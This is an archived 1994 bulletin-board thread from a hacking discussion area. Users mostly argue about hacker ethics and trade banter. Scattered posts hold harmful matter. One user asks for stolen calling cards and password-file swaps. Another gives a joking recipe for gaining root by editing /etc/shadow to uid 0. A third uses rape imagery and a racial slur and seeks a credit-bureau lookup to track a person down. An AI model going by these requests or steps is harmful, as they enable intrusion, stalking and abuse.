they don't, they damn well make it their first priority to learn it. If you want to learn to hack, throw your silly ass scripts in the trash and go RTFM. Or, ignore this post and stick your head back up your ass. A final note: The quickest way to spot a waanabe is to find someone who calls themselves a hacker. If you can hack, people will know you as such by your word and actions, not by your self-praise. The people who talk the most tend to know the least. Sorry for yet another flame on the base, I realize it's already been flooded lately with them. I couldn't shut up anymore. And, BTW, I'm not a hacker, so don't bother asking me to justify myself. I study, listen and learn; perhaps someday... Maedhros /\ /--\ / \ From Ziggy@yabbs Sun Aug 7 05:43:43 1994 From: Ziggy@yabbs To: maedhros@yabbs Subject: Learning Date: Sun Aug 7 05:43:43 1994 I'd have to agree with you on the part of learning -- I think that it should be the predominant force etched in everyone's mind. You don't learn the innerworkings of shit if you type chmod +x and run the damned thing. ;) Anyways. I'm tired. It's 5 in the morning. I need some coffee. From brael@yabbs Sun Aug 7 06:58:14 1994 From: brael@yabbs To: maedhros@yabbs Subject: re: hacking Date: Sun Aug 7 06:58:14 1994 hmm.. my hacker ethic is simply if its fun, do it.. if that means be 1 of thoze LoDish twits which make the eff so godamn proud as you follow the holy path of learned useless knowledge (COMSEC AHAH!) to a haq0ur state of enlightenment then do it.. if it means be a cyber gangsta boogie computer terrorist only concerned with the way in no matter how lowly people think you r 4 running a skript from ur bag of trix n treats then do it..!.. Being a good computer security penetrator/telco phreak ain't too much to be proud of kids.. you end up in a)jail (phiber) b)with your legs broken (SuperN1gger after he couldn't come up with enough ATT 75/85 forwards for the mafia), c)running a failed security co. no matter how much free publicity u get (ComSec lod/h), d)shaving your group's name in the back of your head (Corrupt/MoD), e)a child molester pale faced mutant (Johnny Draper aka the capt. of the sugary variety), f)work for private investigators and eventually get busted (kludge) snif.. g)u'll wear pajama's everywhere, even in foggy situations.. (billsf, hacktic@sf) h)u'll be held in jail for the rest of your life for no apparent reason (dark dante after he t00k photos of himself fuckin with remob at the c.o.) h)resort to netsex as ur only source of love and affection cuz ur skared if people meet you they'll say you look like an evil hairy beast of a dwarf (skywise).. n e ways.. i could go on but u get the picture.. if u want to learn something kewl get Super VGA Graphics programming secrets by steve rimmer and code some fat demo and win 10K at assembly 94.. crack systems 4 fun, not mdssdf woops not 4 some l@ym sense of holy pride but remembah thats jus n opinion funplayexplorepokejumpcausehavocsmilefunfun! brael.. the spliff went rryte 2 my head, From Natalie@yabbs Sun Aug 7 10:13:53 1994 From: Natalie@yabbs To: brael@yabbs Subject: re: hacking Date: Sun Aug 7 10:13:53 1994 odd, i was always under the impression that true hacking was learning as well. but then again, that was ten years ago. perhaps things have changed since then. *goes back to reading her unix shell programming book* natalie From No_Name@yabbs Sun Aug 7 12:40:44 1994 From: No_Name@yabbs To: K0d3R@yabbs Subject: re: FuQin NaRqS Date: Sun Aug 7 12:40:44 1994 AS I quote K0d3R doodz I was told this board r0cks. But there seems to be lots of drag lamers on here like bart. Lets get this thing going, I am looking for outdials and some good att cards--I have lots of passwd files so lets get the haqin shit going guys! K0d3R [tUpA(] End quote. What the hell is wrong with this place? geeze.. I wish they had a lamer filter for people that suck.. Swap password filez? ya.. okay.. :) BTW: where the hell did ya come up with the group name from? MTV? PPRiCK Rulez.. :) Haha.. *Smirk* From Phreddie@yabbs Sun Aug 7 13:26:43 1994 From: Phreddie@yabbs To: balistic@yabbs Subject: re: Sorry Date: Sun Aug 7 13:26:43 1994 Unfortunately though, the majority of the really foolish and careless 'hackers' are around 14 years old.. so that's why people generally tend to depise them .. I mean seriously, the other day on some BBS I read an anonymous message of some guy describing how cool he was because he knew how to hack AoL!!! Jesus H. Christ, I almost died of laughter.. From -DuCK-@yabbs Sun Aug 7 13:27:41 1994 From: -DuCK-@yabbs To: htoaster@yabbs Subject: re: FuQin NaRqS Date: Sun Aug 7 13:27:41 1994 > i personally don't beleive in ever denying access to anyone unless > they are openly harrasing other users. in fact the software has > very limited ways to deny access to people, since i can only ban an > entire site (since I don't validated individual users through email > or anything, I can't require a email address for access and ban > based on that). > > > i think he should understand what the board is about and what we're > looking for here...since the system got put in the #hack faq I > expect a lot of loosers to be showing up who expect to find lots of > codes and stuff, and we just need to explain that we don't want > that. i get where you are coming from.. :) I guesswe'll just have to tell them loosers.. NO CODEZ dewd.. hehe.. well, see you around.. :0 i mean :) /~~~~~~\ ____ | \ | | | \ ____ | | /\ | |___ | | ____| |/ > | | | | |/ ___| / | | | | | / | \ | / |/ | \__/ \ |\ \ \________/ \_________/\_______/___| \____\ From -DuCK-@yabbs Sun Aug 7 13:29:37 1994 From: -DuCK-@yabbs To: C.S.@yabbs Subject: re: FuQin NaRqS Date: Sun Aug 7 13:29:37 1994 > As long as he doesn't do any illegal shit here, who cares? > yeah, i guess so, as long as he don't get us in trouble! i hope this bbs stays up for a long time.. it's lotsa fun i don't want some warez puppy/code trader to ruin it for all of us.. :0 From -DuCK-@yabbs Sun Aug 7 13:32:47 1994 From: -DuCK-@yabbs To: brael@yabbs Subject: re: hacking Date: Sun Aug 7 13:32:47 1994 i don't think we needed any examples of what you're talking about.. it's not nice to flame people.. From Justbob@yabbs Sun Aug 7 15:05:31 1994 From: Justbob@yabbs To: cosmos@yabbs Subject: re: FuQin NaRqS Date: Sun Aug 7 15:05:31 1994 Can you say `ftp`? good! I knew you could! From balistic@yabbs Sun Aug 7 15:33:53 1994 From: balistic@yabbs To: all@yabbs Subject: re: FuQin NaRqS Date: Sun Aug 7 15:33:53 1994 I think somebody needs to asassin-box k0d3r... From cosmos@yabbs Sun Aug 7 15:35:00 1994 From: cosmos@yabbs To: Justbob@yabbs Subject: re: FuQin NaRqS Date: Sun Aug 7 15:35:00 1994 In message re: FuQin NaRqS, Justbob said: > Can you say `ftp`? > good! I knew you could! > You need to write your sentences in plain English man. Nobody is "connected" through FTP. Anyhow, you are telling me he got busted or raided or spyed on or molested or whatever for using phred's FTP?? Bwahahahahah....must be that gif of Jazzy... Cosmos From balistic@yabbs Sun Aug 7 15:36:05 1994 From: balistic@yabbs To: all@yabbs Subject: re: FuQin NaRqS Date: Sun Aug 7 15:36:05 1994 yeah...all us yabbs users are reeeeal mischeivous :) From balistic@yabbs Sun Aug 7 15:37:50 1994 From: balistic@yabbs To: maedhros@yabbs Subject: re: hacking Date: Sun Aug 7 15:37:50 1994 yeah..I read somewhere that synergy hacked into the DOD just to learn C because it wasn't on the market yet... balistic From balistic@yabbs Sun Aug 7 15:40:45 1994 From: balistic@yabbs To: Phreddie@yabbs Subject: re: Sorry Date: Sun Aug 7 15:40:45 1994 yes, unfortunatly many of the morons in my age bracket are lacking in intelligence...:) From balistic@yabbs Sun Aug 7 15:41:54 1994 From: balistic@yabbs To: -DuCK-@yabbs Subject: re: FuQin NaRqS Date: Sun Aug 7 15:41:54 1994 I don't know what I'd do without my yabbs....sob From balistic@yabbs Sun Aug 7 15:43:53 1994 From: balistic@yabbs To: all@yabbs Subject: re: GIFs Date: Sun Aug 7 15:43:53 1994 might be on the wrong thread here but can anyone scan a GIF of me (without perversly altering it) into yabbs......thanx balistic From Skywise@yabbs Sun Aug 7 18:07:41 1994 From: Skywise@yabbs To: K0d3R@yabbs Subject: re: FuQin NaRqS Date: Sun Aug 7 18:07:41 1994 nice try bart... ;) *smiggle* From Mystery@yabbs Sun Aug 7 18:46:51 1994 From: Mystery@yabbs To: Natalie@yabbs Subject: re: Sorry Date: Sun Aug 7 18:46:51 1994 That's good to know... ;) From Mystery@yabbs Sun Aug 7 18:47:40 1994 From: Mystery@yabbs To: Typhon@yabbs Subject: re: Hitting On Natalie Date: Sun Aug 7 18:47:40 1994 Hehehehe.... Go for it. ;) From Mystery@yabbs Sun Aug 7 18:49:53 1994 From: Mystery@yabbs To: balistic@yabbs Subject: re: Sorry Date: Sun Aug 7 18:49:53 1994 Not all 14 year olds are like that, but some people have that middle school frame of mind and really show their lack of maturity. I personally would rather see some flame message base where people can take their complaints and flames... Myself, I won't flame unless someone has given me a reason to. From Justbob@yabbs Sun Aug 7 19:41:44 1994 From: Justbob@yabbs To: cosmos@yabbs Subject: re: FuQin NaRqS Date: Sun Aug 7 19:41:44 1994 Yeah, but ftp'ed in isn't exactly plain english either? ftping to yabbs? And yeah, he got busted for ftp because he didn't have a utmp entry and yabbs has a hack mesg base. From htoaster@yabbs Sun Aug 7 20:21:24 1994 From: htoaster@yabbs To: Justbob@yabbs Subject: re: FuQin NaRqS Date: Sun Aug 7 20:21:24 1994 In message re: FuQin NaRqS, Justbob said: > Yeah, but ftp'ed in isn't exactly plain english either? > ftping to yabbs? > And yeah, he got busted for ftp because he didn't have a utmp entry and > yabbs has a hack mesg base. his sysadmin seems overly cautious if he is worried about someone ftping to because yabbs (which can only be accessed through telnet) has a hack message base (which only a small group of yabbs users read anyway). The ftp site really has very little to offer unless you want source code to yabbs or gifs of some of the users. alex From cosmos@yabbs Sun Aug 7 20:30:54 1994 From: cosmos@yabbs To: Justbob@yabbs Subject: re: FuQin NaRqS Date: Sun Aug 7 20:30:54 1994 In message re: FuQin NaRqS, Justbob said: > Yeah, but ftp'ed in isn't exactly plain english either? > ftping to yabbs? > And yeah, he got busted for ftp because he didn't have a utmp entry and > yabbs has a hack mesg base. Oh christ. By busted, who do you mean. I doubt this would hold up in court... Cosmos From Slaughte@yabbs Sun Aug 7 20:42:48 1994 From: Slaughte@yabbs To: all@yabbs Subject: My Name Date: Sun Aug 7 20:42:48 1994 Okay I've been asking around for this for a long time and nobody seems to be able to help me. I once had a command that would change my Account name. All it does is change the name that appears in messages, finger, posts etc. Would anybody be able to tell me what that command was? Thanks. Send the reply to From Steyr@yabbs Sun Aug 7 21:28:32 1994 From: Steyr@yabbs To: Slaughte@yabbs Subject: re: My Name Date: Sun Aug 7 21:28:32 1994 chfn From Natalie@yabbs Sun Aug 7 23:48:28 1994 From: Natalie@yabbs To: Mystery@yabbs Subject: re: Hitting On Natalie Date: Sun Aug 7 23:48:28 1994 *wink* natalie From Natalie@yabbs Sun Aug 7 23:50:46 1994 From: Natalie@yabbs To: Slaughte@yabbs Subject: re: My Name Date: Sun Aug 7 23:50:46 1994 woohoo!!! I actually know an answer! yesyesyes!!!!!!!!!!!!! to change the account name( ie, the name that appears on yer email) justtype chfn at the prompt....thatSHOULD work (itdoes on my system) yes...i AM THE HACKER BABE!!!!!!!!!! *giggles insanely* natalie From cosmos@yabbs Mon Aug 8 00:02:52 1994 From: cosmos@yabbs To: Natalie@yabbs Subject: re: My Name Date: Mon Aug 8 00:02:52 1994 No No natalie. This is #hack. To change your name you have to do the following: % run Rd|sT S(r|Pt h3r3 # vi /etc/shadow (or god knows what shadow file - or /etc/passwd) # change group and uid to 0 % id % uid=0 gid=0 There. Now your name is changed and you have root access. Cosmos ;) From Natalie@yabbs Mon Aug 8 02:04:57 1994 From: Natalie@yabbs To: cosmos@yabbs Subject: re: My Name Date: Mon Aug 8 02:04:57 1994 oh fine *sob* just burst my bubble. and i was feeling so smart too. *sob* YOU JUST RUINED MY DAY, YOU BUTTHEAD!!!! NEVER AGAIN WILL I CALL MYSELF YOUR HACKER BABE!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! heehee ;) damn i'm funny natalie From -DuCK-@yabbs Mon Aug 8 11:03:36 1994 From: -DuCK-@yabbs To: balistic@yabbs Subject: re: Sorry Date: Mon Aug 8 11:03:36 1994 > > yes, unfortunatly many of the morons in my age bracket are lacking > in intelligence...:) > I agree, we need some more inteligent people in our age bracket.. From -DuCK-@yabbs Mon Aug 8 11:04:28 1994 From: -DuCK-@yabbs To: balistic@yabbs Subject: re: FuQin NaRqS Date: Mon Aug 8 11:04:28 1994 > > I don't know what I'd do without my yabbs....sob > me niether.. :) I stay here too much.. What can i say? -- I'M HOOKED!!! -- From htoaster@yabbs Mon Aug 8 11:50:19 1994 From: htoaster@yabbs To: cosmos@yabbs Subject: re: My Name Date: Mon Aug 8 11:50:19 1994 In message re: My Name, cosmos said: > > No No natalie. This is #hack. To change your name you have to do the > following: > > % run Rd|sT S(r|Pt h3r3 > # vi /etc/shadow (or god knows what shadow file - or /etc/passwd) well, i would hope that you would run vipw, so that the shadow and real password files were in sync... > # change group and uid to 0 > % id > % uid=0 gid=0 > From cosmos@yabbs Mon Aug 8 14:27:20 1994 From: cosmos@yabbs To: htoaster@yabbs Subject: re: My Name Date: Mon Aug 8 14:27:20 1994 In message re: My Name, htoaster said: > In message re: My Name, cosmos said: > > > > No No natalie. This is #hack. To change your name you have to do the > > following: > > > > % run Rd|sT S(r|Pt h3r3 > > # vi /etc/shadow (or god knows what shadow file - or /etc/passwd) > well, i would hope that you would run vipw, so that the shadow and real > password files were in sync... Blah. Yeah on a BSD system and most other "smart" systems yes, but some braindead sysv's like UnixWare et all dont have vipw or even better yet dont even use shadow... Tnx A. Cosmos From balistic@yabbs Mon Aug 8 15:49:13 1994 From: balistic@yabbs To: Mystery@yabbs Subject: re: Sorry Date: Mon Aug 8 15:49:13 1994 You f****** lamer!!! what do f****** mean you won't f****** flame unless given a f****** reason!!! :) just kidden...hehheh balistic From balistic@yabbs Mon Aug 8 15:54:58 1994 From: balistic@yabbs To: -DuCK-@yabbs Subject: re: Sorry Date: Mon Aug 8 15:54:58 1994 here here! From balistic@yabbs Mon Aug 8 15:56:29 1994 From: balistic@yabbs To: -DuCK-@yabbs Subject: re: FuQin NaRqS Date: Mon Aug 8 15:56:29 1994 ya know what DuCK? I just realized 70% of my freinds are on YABBS!! pretty sad huh :) From C.S.@yabbs Tue Aug 9 01:27:37 1994 From: C.S.@yabbs To: maedhros@yabbs Subject: re: hacking Date: Tue Aug 9 01:27:37 1994 In message hacking, maedhros said: > > Sorry for yet another flame on the base, I realize it's already been > flooded lately with them. I couldn't shut up anymore. And, BTW, I'm not > a hacker, so don't bother asking me to justify myself. I study, listen > and learn; perhaps someday... That was a pretty good flame though... From maedhros@yabbs Tue Aug 9 02:32:53 1994 From: maedhros@yabbs To: C.S.@yabbs Subject: re: hacking Date: Tue Aug 9 02:32:53 1994 In message re: hacking, C.S. said: > In message hacking, maedhros said: > > Sorry for yet another flame on the base, I realize it's already been > > flooded lately with them. I couldn't shut up anymore. And, BTW, I'm not > > a hacker, so don't bother asking me to justify myself. I study, listen > > and learn; perhaps someday... > That was a pretty good flame though... It's just that these crackers and warez kiddies are giving a bad name to a group they don't even belong too. I was rifling through tonight and listening to a bunch of sysadmins suggesting how to recover systems which "hackers" had destroyed. What the hell kind of hacker would willfully destroy files on someone's system. Granted, it is conceivable that a hacker might break into something: But maliciously corrupt and/or destroy data?! The problem is when these jerks do things like this and claim they are hackers. The media displays cases like this and the word hacker becomes tainted; synonymous with vandal. Maedhros /\ /--\ "...and now, back to the regularly scheduled base..." / \ sorry again, I'll shut up least I'll try From kke@yabbs Tue Aug 9 03:29:21 1994 From: kke@yabbs To: dialtone@yabbs Subject: re: Operation Sundevil Date: Tue Aug 9 03:29:21 1994 Try In the directory /pub/usenet-by-hierarchy/comp/dcom/telecom.... just a guess, I have the file on my computer... Killer Keebler Elf Please Don't Squeeze the Charmin From kke@yabbs Tue Aug 9 03:41:16 1994 From: kke@yabbs To: all@yabbs Subject: Public Access Unix Date: Tue Aug 9 03:41:16 1994 Call Pyromania -- Binghamton, NY's Only Free Unix Site Access on First Call -- Internet Email and Usenet by the End of August -- 607-763-3454 Killer Keebler Elf never trust a moron From 'Drew@yabbs Tue Aug 9 11:23:00 1994 From: 'Drew@yabbs To: natalie@yabbs Subject: re: nitting on ???? Date: Tue Aug 9 11:23:00 1994 what's this m'dear....I see how you are.... *grin* 'drew... From Natalie@yabbs Tue Aug 9 16:03:04 1994 From: Natalie@yabbs To: 'Drew@yabbs Subject: re: nitting on ???? Date: Tue Aug 9 16:03:04 1994 nothing love...nothing at all... *smile* natalie who wonders why her emailbox is still lonely and empty From GPF@yabbs Tue Aug 9 17:14:28 1994 From: GPF@yabbs To: arachnoi@yabbs Subject: re: gpf another yalk HO? Date: Tue Aug 9 17:14:28 1994 In message gpf another yalk HO?, arachnoi said: > the level of maturity of your titles truly exemplifies your greatness... > > {Hahahaha, another r0dent speaks! tell us how great u are GPF! Tell warez puppy alphabet and language, interesting.... > us how u hacked a Unix machine, along with every other 12 yr old with oh yup, you figured me out.... i'm a silly little system cracker who runs krad rdist scripts in hopes of being elite. that's me *smirk* > a modem. If u really want to impress me, try answering this: How does > Gould ENCORE computers pack their passwords? I'll will take a little oooooh, he's cracked worthless computers.... next he'll be asking me how to break into dynix/ptx that'll be a real useful tad of knowledge when UTX makes its big comeback... > more experience than dicking around on the school lameframe to anwer > that. I await your answer.} heheheh.... you're not even worth the flame.... From Zbadba@yabbs Tue Aug 9 22:04:12 1994 From: Zbadba@yabbs To: all@yabbs Subject: hmmm... Date: Tue Aug 9 22:04:12 1994 I really love this message base. Seriously! It's about the best laff to be had on yabbs ('ceptwhen Cheech logs in, maybe. :)) I don't post much here, mainly because my knowledge is relatively miniscule regarding all things unix. (ooh, been using unix for all of 6 months. blah. not even scratching the surface. It'd be nice to install a BSD or even Linux on my system, but it'll have to wait until I have the time and the money. Right now, I have neither.) So I'll crawl back in my corner now, not a hacker but a user. Maybe I'll be more helpful when I know more. (Say, that is the point, isn't it? Not to give knowledge away, perhaps, but to teach and to learn (they're really the same thing, like mass and energy). Hmmm... maybe the point isn't just senseless flaming after all....) I wax palaverous. Continue the flames. I really need more good laughs in a day. From balistic@yabbs Wed Aug 10 13:29:43 1994 From: balistic@yabbs To: all@yabbs Subject: hmmm... Date: Wed Aug 10 13:29:43 1994 It's not the size of a man's modem that matters... :) balistic From dmonger@yabbs Wed Aug 10 13:49:56 1994 From: dmonger@yabbs To: arachnoi@yabbs Subject: re: gpf another yalk HO? Date: Wed Aug 10 13:49:56 1994 silly me, i guess i spent too much time programming and sysadmining and not enough learning silly acronyms. paint me a non-hacker drat -peter From Quetzal@yabbs Wed Aug 10 14:20:47 1994 From: Quetzal@yabbs To: arachnoi@yabbs Subject: re: Cell switch software Date: Wed Aug 10 14:20:47 1994 What kind of equipment do you use to program cell phones.. From Quetzal@yabbs Wed Aug 10 14:24:34 1994 From: Quetzal@yabbs To: arachnoi@yabbs Subject: re: gpf another yalk HO? Date: Wed Aug 10 14:24:34 1994 What is there're packed in thier own juice to preserve freshness? I'LL TAKE REVERSE ENGINEERING FOR $400! From GPF@yabbs Wed Aug 10 17:38:25 1994 From: GPF@yabbs To: arachnoi@yabbs Subject: re: gpf another yalk HO? Date: Wed Aug 10 17:38:25 1994 heres a clue, since you seem to have a lack of one, hacking has nothing to do with memorizing obscure computer trivia, it is rather actually learning, pushing a system beyond it's limits, and doing things in ways that noone has done before. still amused and waiting for the next question arach pulls out of his big book of computter trivia, .....gpf..... From cosmos@yabbs Wed Aug 10 17:41:08 1994 From: cosmos@yabbs To: arachnoi@yabbs Subject: re: gpf another yalk HO? Date: Wed Aug 10 17:41:08 1994 You are really impressing me little boy. Trivia is the sign of the elite hacker aint it... You my friend fit into another category... Spend all day memorizing text articles and tidbits to "brag" about but couldnt equate anything itno a real experience. Have you ever had a system compromised? Ever find a flaw in OS design(excluding dos and solaris).... That my friend is what I call a true hacker. I think MIT does too... Cosmos From Skywise@yabbs Wed Aug 10 19:57:41 1994 From: Skywise@yabbs To: cosmos@yabbs Subject: re: gpf another yalk HO? Date: Wed Aug 10 19:57:41 1994 In a previous mislet, Cosmos retorted... I think MIT does too Multiplex Informational Transfer (used by the COSMOS database to transfer top sekrit stuff to and from telco orafices) I mean offices From dmonger@yabbs Wed Aug 10 20:02:24 1994 From: dmonger@yabbs To: arachnoi@yabbs Subject: re: gpf another yalk HO? Date: Wed Aug 10 20:02:24 1994 > paint me a non-hacker {or even a long time sysadmin or programmer. Any > sysadmin with some experience would know what those two pieces of junk > are. > They plagued the computer world for over 30 yrs, and we still have them > laying around.} well there are plenty of sysadmin's and programmers in the real world that suck, i'll agree. But i'd still rather deal with them then loozer <= high-school students who learned all about hacking by reading 3l33t zines like phrack and don't bother to spend any time exploring or learning, just rote memorization. and i still fail to see how acronyms fit into hacking. -peter who is impressed that hackers have been given a worse name over the last several years by little know-nothing morons than by 30+ years of shitty programmers and administrators. From balistic@yabbs Wed Aug 10 20:46:10 1994 From: balistic@yabbs To: dmonger@yabbs Subject: re: gpf another yalk HO? Date: Wed Aug 10 20:46:10 1994 boooo yaaaaaa :) From balistic@yabbs Wed Aug 10 20:47:29 1994 From: balistic@yabbs To: arachnoi@yabbs Subject: re: hmmm... Date: Wed Aug 10 20:47:29 1994 ulp.....i've only got a 1200 :) From balistic@yabbs Wed Aug 10 20:49:30 1994 From: balistic@yabbs To: GPF@yabbs Subject: re: gpf another yalk HO? Date: Wed Aug 10 20:49:30 1994 gpf....pushing a system where no one has gone befor? do I smell hacker trek... :) From balistic@yabbs Wed Aug 10 20:52:10 1994 From: balistic@yabbs To: all@yabbs Subject: re: gpf another yalk HO? Date: Wed Aug 10 20:52:10 1994 dah...........ummm.........okay okay here's a good one....what's DOS stand for...huhhuh......:) From Justbob@yabbs Wed Aug 10 21:15:00 1994 From: Justbob@yabbs To: cosmos@yabbs Subject: re: FuQin NaRqS Date: Wed Aug 10 21:15:00 1994 Busted as in the security ppl came and asked him if he knew about it...not busted as in legal action pending. From Justbob@yabbs Wed Aug 10 21:25:27 1994 From: Justbob@yabbs To: arachnoi@yabbs Subject: re: gpf another yalk HO? Date: Wed Aug 10 21:25:27 1994 uh...yer pretty know what IBM stands for? that'd be pretty cool.. I know it's been said enuff already, but memorization of a bunch of acronymns & use of the S+up||) substitutions doth not a hacker make... (hey, that's pretty know....I could get that published ;) From Natalie@yabbs Wed Aug 10 22:57:09 1994 From: Natalie@yabbs To: Justbob@yabbs Subject: re: gpf another yalk HO? Date: Wed Aug 10 22:57:09 1994 uh...doesn't IBM stand for _I_tty _B_itty _M_en? natalie From dmonger@yabbs Thu Aug 11 00:11:46 1994 From: dmonger@yabbs To: Natalie@yabbs Subject: re: gpf another yalk HO? Date: Thu Aug 11 00:11:46 1994 Itty Bitty bouncing Machine From Death@yabbs Thu Aug 11 02:08:17 1994 From: Death@yabbs To: all@yabbs Subject: re: gpf another yalk HO? Date: Thu Aug 11 02:08:17 1994 Well... I see that not much has changed in the last 100 messages... At least half of the flames are creative though... *sigh* Why doesn't everybody get off of their high horse and actually try to LEARN something out of this base? That's what it was meant for, as I recall.... --Death From Death@yabbs Thu Aug 11 02:16:03 1994 From: Death@yabbs To: htoaster@yabbs Subject: *sigh* Date: Thu Aug 11 02:16:03 1994 Ah well... I was going to give an example of how this base could be used to learn, but it seems that you've deleted all of the old messages *sigh* oh well... That's life I s'pose. (Besides, all the flames are entertaining) --Death From brael@yabbs Thu Aug 11 05:55:01 1994 From: brael@yabbs To: all@yabbs Subject: re: *sigh* Date: Thu Aug 11 05:55:01 1994 w0uldn't u be st0ked if you came across an automated watts router where a blonde soundin b1mbo bitch just beggin u to rape AT&T sucessfully seduces u with , "Welcome to the Denver Technology Control Center. To reach the proper technology press 1 for the 4ESS, to reach the 5ESS press 2, press 3 for the CCS, press 4 for Cellular, press 5 for the Work Management group supporting WMS, press 5 for Adjunct, and 7 for DAC." and this girl wants it.. she fuckin wants 1t bad.. shes just beggin to get raped n pillaged by some slick lil telk0 phreak thats g0nna do er in every possible way concievable.. 0h w3ll random sick thoughts in my drunk.. BTW, that router is avaliable to ANYONE who can help me track someone down with a CBI DTEC SS pull.. if so email me NOW!.. i love how every1 likesss to point at some1 else and say.. ur not a hacker! u cant hack ur way outta a paper bag!! Mhhaaan ur 14years old!!! and every1 always finishes with that little disclaimer that says... i know nothing, maybe someday..but believe me, i know what a real hacker is supposed to b.. if ur still crackin security systems after 20 n making no $$ ur fucked in the head and need 2 find some new puzzles to let ur brain fiddle with..ok ill stop the meaningless banter right NOW. From Famine@yabbs Thu Aug 11 07:48:54 1994 From: Famine@yabbs To: arachnoi@yabbs Subject: re: hmmm... Date: Thu Aug 11 07:48:54 1994 Surely its bandWIDTH that matters not just the size of his modem! Famine(the silly) From rattler@yabbs Thu Aug 11 07:52:00 1994 From: rattler@yabbs To: cosmos@yabbs Subject: re: Sorry Date: Thu Aug 11 07:52:00 1994 In message re: Sorry, cosmos said: > The correct way to ask a question my young friend is "What is". > > Anyhow, ISC is Interactive UNIX from Sunsoft. If I remember correctly a > Sys V 3 clone from Sun before the advent of their latest flop Solaris. > > Cosmos > From htoaster@yabbs Thu Aug 11 12:45:27 1994 From: htoaster@yabbs To: Death@yabbs Subject: re: *sigh* Date: Thu Aug 11 12:45:27 1994 In message *sigh*, Death said: > Ah well... I was going to give an example of how this base could be used > to learn, but it seems that you've deleted all of the old messages *sigh* > oh well... That's life I s'pose. > (Besides, all the flames are entertaining) well, there are still one years worth of messages there. yabbs hasn't been able to delete messages since the client server version (due to the new message format), and the server client version has been running almost one year...(sept 1st as i recall)... i guess i wouldn't find it that hard to beleive that nothing interesting has been posted for one year though... alex From Typhon@yabbs Thu Aug 11 12:49:19 1994 From: Typhon@yabbs To: Natalie@yabbs Subject: re: My Name Date: Thu Aug 11 12:49:19 1994 Yoiu are many things. (Does this count as hitting on you?) Typhon the Usurper From Typhon@yabbs Thu Aug 11 12:50:01 1994 From: Typhon@yabbs To: -DuCK-@yabbs Subject: re: Sorry Date: Thu Aug 11 12:50:01 1994 We need more intelligent people in EVERY age bracket Typhon the Usurper From GPF@yabbs Thu Aug 11 13:01:00 1994 From: GPF@yabbs To: Death@yabbs Subject: re: *sigh* Date: Thu Aug 11 13:01:00 1994 In message *sigh*, Death said: > Ah well... I was going to give an example of how this base could be used > to learn, but it seems that you've deleted all of the old messages *sigh* > oh well... That's life I s'pose. > (Besides, all the flames are entertaining) > > --Death instead of just bitching how about starting a new thread? From Natalie@yabbs Thu Aug 11 15:56:03 1994 From: Natalie@yabbs To: Typhon@yabbs Subject: re: My Name Date: Thu Aug 11 15:56:03 1994 heehee. i dunno. ask drew. natalie :) From balistic@yabbs Thu Aug 11 16:55:18 1994 From: balistic@yabbs To: Famine@yabbs Subject: re: hmmm... Date: Thu Aug 11 16:55:18 1994 and whether it's internal or external :) From balistic@yabbs Thu Aug 11 16:56:42 1994 From: balistic@yabbs To: Typhon@yabbs Subject: re: Sorry Date: Thu Aug 11 16:56:42 1994 :) From brael@yabbs Thu Aug 11 17:24:12 1994 From: brael@yabbs To: Death@yabbs Subject: re: *sigh* Date: Thu Aug 11 17:24:12 1994 come death, teach us somethin will ya.. enuf bitchin, bring it on n e thing.. dont matter what.. From brael@yabbs Thu Aug 11 17:27:17 1994 From: brael@yabbs To: Typhon@yabbs Subject: re: Sorry Date: Thu Aug 11 17:27:17 1994 mayB but we sure as hell need less Usurper's in EVERY age bracket.. Usurpers have gots 2 roll on.. brael From -DuCK-@yabbs Thu Aug 11 20:56:44 1994 From: -DuCK-@yabbs To: Typhon@yabbs Subject: re: Sorry Date: Thu Aug 11 20:56:44 1994 hehe i agree From Xela@yabbs Thu Aug 11 23:53:47 1994 From: Xela@yabbs To: GPF@yabbs Subject: maybe not Date: Thu Aug 11 23:53:47 1994 "stick to anarchy, you don't make yourself look like an ass there..." Guess again, GPF. Arachnoying makes himself look like an ass everywhere, especially anarchy. X From Typhon@yabbs Fri Aug 12 08:44:37 1994 From: Typhon@yabbs To: all@yabbs Subject: Usurpers Date: Fri Aug 12 08:44:37 1994 If there were more Usurpers, there'd be less deadwood... Not a bad thing. (Of course, lo who is talking.) Typhon the Usurper From A.x.E.@yabbs Fri Aug 12 12:57:03 1994 From: A.x.E.@yabbs To: all@yabbs Subject: ??? Date: Fri Aug 12 12:57:03 1994 Isn't there this slight problem with the publicity of this? What if someone wanted to ask some real q*ues+ktions, that couldn't be asked here? Sorry to sound so neophytish... I'm a newcomer... From htoaster@yabbs Fri Aug 12 13:02:49 1994 From: htoaster@yabbs To: A.x.E.@yabbs Subject: re: ??? Date: Fri Aug 12 13:02:49 1994 In message ???, A.x.E. said: > Isn't there this slight problem with the publicity of this? What if > someone wanted to ask some real q*ues+ktions, that couldn't be asked here? > Sorry to sound so neophytish... I'm a newcomer... it depends on what you consider a real question...asking something like "so what is the real bug in that last cert report" is fine, asking something like "hey d00d, where i do i get the latest |<-rAd elite warez and codes" isn't... the first isn't illegal because it doesn't break anyones personal security or infringe on their rights. using it may be, but the information itself isn't. alex From robtelee@yabbs Fri Aug 12 19:37:31 1994 From: robtelee@yabbs To: A.x.E.@yabbs Subject: re: ??? Date: Fri Aug 12 19:37:31 1994 For true conficetiality, take it to e-mail. Htoaster DOES NOT allow illegal activity to take place on here. It preserves the integrity of the sys. From Skywise@yabbs Sat Aug 13 11:59:59 1994 From: Skywise@yabbs To: arachnoi@yabbs Subject: re: gpf another yalk HO? Date: Sat Aug 13 11:59:59 1994 arachnoi spurted: I have held and repelled the barbarians at the gateway blah. GATEWAYS are easy pickins...I heard you can just hold down the insert button when they boot to reset the bios defaults. From GPF@yabbs Sat Aug 13 12:10:36 1994 From: GPF@yabbs To: arachnoi@yabbs Subject: re: gpf another yalk HO? Date: Sat Aug 13 12:10:36 1994 In message re: gpf another yalk HO?, arachnoi said: > Hahahahaha, aren't U and GPF embarresed that u don't know what a Teletype we don't? perhaps we haven't spent time looking up the names of teletypes in our big books of computer trivia, but i fail to see how that would indicate that we don't know what a teletype is > is? I didn't ask the question to pull from my years of trivia, but to your years of trivia eh? you mean your years of memorizing text files? somehow i'm not suprised.... > point out that u can't HACK if u don't know what's out there. Otherwise u > end up like GPF, running scripts and not knowing much else. Get the point hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahah hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahah hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahah hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahah 